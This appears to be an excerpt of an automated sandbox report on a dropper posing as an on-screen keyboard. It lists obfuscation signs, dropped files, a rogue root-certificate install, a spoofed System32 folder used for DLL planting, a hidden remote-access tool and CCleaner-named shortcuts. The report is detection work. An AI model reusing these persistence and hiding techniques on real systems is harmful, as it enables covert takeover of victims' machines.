Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_004251C8 push ecx; mov dword ptr [esp], eax 17_2_004251CD
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_0041A1D4 push ecx; mov dword ptr [esp], ecx 17_2_0041A1D8
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_00459260 push ecx; mov dword ptr [esp], edx 17_2_00459261
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_00430214 push ecx; mov dword ptr [esp], eax 17_2_00430215
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_00494220 push 004942FFh; ret 17_2_004942F7
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_004223E4 push 004224E8h; ret 17_2_004224E0
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_00458380 push ecx; mov dword ptr [esp], edx 17_2_00458381
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_00458390 push ecx; mov dword ptr [esp], edx 17_2_00458391
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_004953AC push ecx; mov dword ptr [esp], edx 17_2_004953AD
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_00493450 push ecx; mov dword ptr [esp], edx 17_2_00493453
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_00458464 push ecx; mov dword ptr [esp], ecx 17_2_00458468
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_00499470 push ecx; mov dword ptr [esp], edx 17_2_00499471
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_00457420 push ecx; mov dword ptr [esp], eax 17_2_00457422
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_004544AC push ecx; mov dword ptr [esp], edx 17_2_004544AD
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_0048D544 push ecx; mov dword ptr [esp], edx 17_2_0048D546
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_00429520 push ecx; mov dword ptr [esp], edx 17_2_00429522
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_0045A520 push ecx; mov dword ptr [esp], edx 17_2_0045A521
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_004595B4 push ecx; mov dword ptr [esp], edx 17_2_004595B5
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_00498604 push ecx; mov dword ptr [esp], edx 17_2_00498605
Source: initial sample Static PE information: section name: .text entropy: 7.52934612956
Source: 1wOdXavtlE.exe, OnScreenKeyboard/MDIParent1.cs High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/Keyboard.cs High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/FrmMain.cs High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/TableLayoutManager.cs High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/KeyboardDialog.cs High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/KeyboardKey.cs High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 1wOdXavtlE.exe, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 1wOdXavtlE.exe, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/MDIParent1.cs High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/Keyboard.cs High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/TableLayoutManager.cs High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardKey.cs High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardDialog.cs High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/MDIParent1.cs High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/Keyboard.cs High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/TableLayoutManager.cs High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardDialog.cs High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardKey.cs High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/MDIParent1.cs High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/Keyboard.cs High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/FrmMain.cs High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/TableLayoutManager.cs High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/KeyboardDialog.cs High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/KeyboardKey.cs High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/MDIParent1.cs High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/Keyboard.cs High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/FrmMain.cs High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/TableLayoutManager.cs High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/KeyboardDialog.cs High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/KeyboardKey.cs High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Installs new ROOT certificates
Source: C:\ProgramData\Immunity\CertMgry\CertMgr.Exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5E2169F36E05D5652FF097A43315EECA06FC5927 Blob
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp File created: C:\Users\user\AppData\Local\Temp\is-QEDPC.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\servs.exe File created: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32\uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp File created: C:\Users\user\AppData\Local\Temp\is-97L06.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Desktop\1wOdXavtlE.exe File created: C:\Users\user\AppData\Local\Temp\sssevs.exe
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp File created: C:\ProgramData\is-R3F67.tmp
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp File created: C:\ProgramData\is-PFD3D.tmp
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Source: C:\Users\user\Desktop\1wOdXavtlE.exe File created: C:\Users\user\AppData\Local\Temp\ssevs.exe
Source: C:\Users\user\Desktop\1wOdXavtlE.exe File created: C:\Users\user\AppData\Local\Temp\servs.exe
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp File created: C:\ProgramData\Immunity\is-1J28N.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp File created: C:\ProgramData\Immunity\CertMgry\is-OTUTI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp File created: C:\ProgramData\Immunity\is-2SOD7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp File created: C:\ProgramData\Immunity\is-4BBH3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp File created: C:\ProgramData\Immunity\is-02I40.tmp
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp File created: C:\ProgramData\is-R3F67.tmp
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp File created: C:\ProgramData\is-PFD3D.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp File created: C:\ProgramData\Immunity\is-1J28N.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp File created: C:\ProgramData\Immunity\CertMgry\is-OTUTI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp File created: C:\ProgramData\Immunity\is-2SOD7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp File created: C:\ProgramData\Immunity\is-4BBH3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp File created: C:\ProgramData\Immunity\is-02I40.tmp
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32\uxtheme.dll
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Source: C:\ProgramData\Immunity\rutserv.exe File created: C:\ProgramData\Remote Manipulator System\install.log

Boot Survival:

Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CCleaner
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 38214
Source: unknown Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 38214
Source: unknown Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 38214
Source: unknown Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 32972 -> 49763
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_005A55A4 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow, 19_2_005A55A4
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_0062F930 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow, 19_2_0062F930
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Stores large binary data to the registry
Source: C:\Windows\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\RMS Host Installer Security
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\servs.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\pass.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
